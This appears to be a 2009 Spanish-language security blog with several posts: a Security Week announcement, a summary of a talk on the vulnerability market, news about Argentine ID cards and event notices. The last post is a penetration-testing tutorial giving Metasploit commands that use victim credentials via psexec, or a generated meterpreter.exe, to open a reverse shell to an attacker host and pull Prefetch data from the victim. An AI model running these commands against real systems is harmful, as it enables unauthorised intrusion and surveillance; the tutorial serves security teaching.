jueves 19 de noviembre de 2009

Semana de la Seguridad Informática

Del próximo 23 al 30 de Noviembre comienza la Semana de la Seguridad Informática, una iniciativa creada para la realización de acciones de capacitación y/o concientización en la materia.

Estas acciones son de gran importancia para prevenir que miembros de nuestra organización puedan cometer errores que provoquen perdidas millonarias:



Durante la semana que viene voy a estar dictando el anteúltimo COMBAT training del 2009, y también voy a dar una charla en un evento organizado por el CSIRT de Banelco con motivo de la Semana de la Seguridad Informática.
Publicado por KungFooSion en 23:56 0 comentarios

jueves 12 de noviembre de 2009

Mostrame La Guita!

Una de las charlas mas interesantes de la ekoparty fue sin dudas la de Pedram Amini, titulada "Mostrame la Guita! Adventures in Buying Vulnerabilities", en donde Pedram nos conto algunas anécdotas y estadísticas del mercado de la compra/venta de vulnerabilidades.


"Guita", en el lunfardo rioplatense significa "dinero" (ver Wikipedia), y "Mostrame La Guita!" seria un paralelismo a la famosa frase "Show me The Money!".

La charla cubrio todo el circuito de la compra/venta de vulnerabilidades, pasando por los researchers, el mercado y los vendors. Pero en mi opinión lo mas interesante fue conocer un poco mas sobre quienes son los compradores, que hacen con lo que compran y cuanto pagan por ello.

Hoy en dia, hay una gran cantidad de prestigiosos researchers que se ganan la vida honestamente vendiendo las vulnerabilidades que descubren. Pero como en cualquier otro negocio, vamos a encontrar un mercado legal, un mercado negro, y otro con muchos grises.

Según "Mostrame la Guita!", el mercado se divide de la siguiente forma:

"White" Market:
- < 20.000 U$D:
- promedio entre 5.000 y 15.000 U$D

"Grey" Market:
.gov resellers:
- promedio entre 20.000 y 100.000 U$D
.gov:
- entre 100.000 y 1.000.000 U$D
- promedio es < 250.000

"Black" Market:
- 20.000 - 100.000 U$D
- cambios de precio a ultimo momento

Siempre me costo entender que gana el "White" Market comprando vulnerabilidades. Algunos de las razones son las siguientes:

- Suscripción anual para clientes que pagan por enterarse primero (sin detalles/sin PoC).
- Productos de seguridad que crean mayor protección contra estos ataques, como firmas para un IDS/IPS por ejemplo.
- Monitoreo mundial de explotaciones con 0-days.
- Reventa de las vulnerabilidades.

En el "Gray" Market, encontramos a gobiernos y a intermediarios de gobiernos. Puede pasar que el researcher no obtenga crédito por su descubrimiento, que se exija un PoC que explote la vulnerabilidad, que el Vendor nunca sea contactado ni tampoco se publique un advisory, y por supuesto que nunca sepamos que se planea hacer con todo eso. Pero claro, se paga mucho mas (hasta 1.000.000 U$D!)

El "Black" Market no hace falta comentarlo ;) Pero todo esto es solo un apice de lo que podemos encontrar en la presentación de Pedram, les recomiendo leerla en profundida, ver las "Notas del Presentador" en Google Docs, y también leer un documento de Charlie Miller llamado "The Legitimate Vulnerability Market", también sobre la misma temática.

Finalizando, me fascino esta presentación, aunque me hubiera sorprendido aun mucho mas, si en vez de llamarse "Mostrame La Guita!", se hubiera llamado "Che boludo, Mostrame La Guita!" :P

FUENTES:
- Presentación "Mostrame La Guita!" en Google Docs
- DVLabs Blog: "Mostrame La Guita!"
- DVLabs Blog: Ekoparty Wrap Up
- Wikipedia: Guita
Publicado por KungFooSion en 17:19 1 comentarios
Etiquetas:

miércoles 11 de noviembre de 2009

Seguridad de los nuevos DNI Argentinos

En el blog de Matt me encontré con un interesante video de La Nación que relata las medidas de seguridad de los nuevos DNI Argentinos.



Casualmente, hace alrededor de 1 mes inicie los tramites para obtener un nuevo DNI porque me perdieron el anterior (si Gesolmina, fuistes vos!), obviamente esperaba tener mi documento para el 2011, con suerte. Pero increíblemente, a solo unos días del anuncio de los nuevos DNI, hoy llego Correo Argentino a traerme mi nuevo documento!

Ahora, yo no puedo tener mas mala suerte, el cartero me pedía un "papelito" que supuestamente me dieron cuando realice el tramite, y como no se donde deje ese papelito, no me entrego el DNI... aaaarrgggggggHHH!!!
Publicado por KungFooSion en 15:11 0 comentarios
Etiquetas:

PampaSeg en Diciembre

El próximo 4 y 5 de Diciembre tendrán lugar las Jornadas de Software Libre y Seguridad Informatica en La Pampa.


El evento es abierto a toda la comunidad, con entrada libre y gratuita. El cupo es limitado a unas 100 personas aproximadamente, por lo cual se requerirá una pre-acreditación desde la web http://www.pampaseg.com

Voy a tener el gusto de dar una charla en este evento, asi que si estan por La Pampa por esas fechas nos vemos alli!
Publicado por KungFooSion en 14:24 0 comentarios
Etiquetas:

domingo 8 de noviembre de 2009

Prefetch en Meterpreter

Siempre me llama la atención la integración de técnicas forenses y anti-forenses al Penetration Testing, como el reciente script para Meterpreter que permite obtener los datos de Prefetch.

¿ Que es Prefetch ?

Cada vez que abrimos una aplicación en Windows se crea un archivo ".pf" en el directorio (%SYSTEMROOT%\Prefetch\), este archivo contiene información para acelerar las aplicaciones que seran abiertas en el futuro.

Dentro del archivo .pf podemos encontrar la fecha y hora en la que el archivo fue abierto, modificado o accedido por ultima vez, y también la cantidad de veces que este fue ejecutado.

El nombre del archivo .pf se arma "NOMBRE-HASH.pf", en donde el HASH se calcula con el path del lugar en donde se encontraba el archivo, por lo que si este fue ejecutado de 2 lugares diferentes, vamos a tener 2 archivos .pf diferentes.

Durante un Penetration Test, conocer cuales son los programas mas utilizados en un sistema nos puede ayudar a identificar los hábitos del administrador o el rol de este sistema en la red.

Hay una herramienta gratuita llamada Windows File Analyzer que nos permite visualizar el contenido de los archivos Prefetch:


Shell con Meterpreter

A continuación dos formas sencillas de obtener una shell con meterpreter sin necesidad de explotar una vulnerabilidad.

El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitira ejecutar un "payload":


use windows/smb/psexec
set PAYLOAD windows/metepreter/reverse_tcp
set RHOST 192.168.13.129
set LHOST 192.168.13.131
set SMBUser Administrador
set SMBPass password
exploit


Otra forma, es crear un binario con el payload, lo transferimos a la víctima, luego dejamos escuchando por la conexión reversa y ejecutamos el binario para generar la conexión con meterpreter:


./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.131 X > meterpreter.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.13.131 E


Prefetch con Meterpreter

Para utilizar Prefetch primero deberíamos actualizar Metasploit (esto hacerlo antes de obtener la shell):


cd /pentest/exploits/framework3
svn update

./msfconsole
run prefetchtool -h



Si es la primera vez que utilizamos Prefetch, el script bajara "prefetch.exe" del repositorio, para luego subirlo y ejecutarlo en la víctima. A continuación listamos los 5 programas mas utilizados en la víctima con el comando "run prefetchtool -x 5":


Otra feature interesante dentro de meterpreter es "timestomp", que nos permite modificar la fecha de creación, modificación y ultimo acceso de los archivos, pero eso lo dejo para otro post... ;)

FUENTES:
- Milo2012's Security Blog: Meterpreter Script for Prefetch-Tool
- Laramies Corner: Windows Prefetcher and forensic analysis
- Windows File Analyzer
- PaulDotCom - Episode 171
- What is the Prefetcher?
- Forensics Wiki - Prefetch
Publicado por KungFooSion en 00:08 0 comentarios
Etiquetas:
Suscribirse a: Entradas (Atom)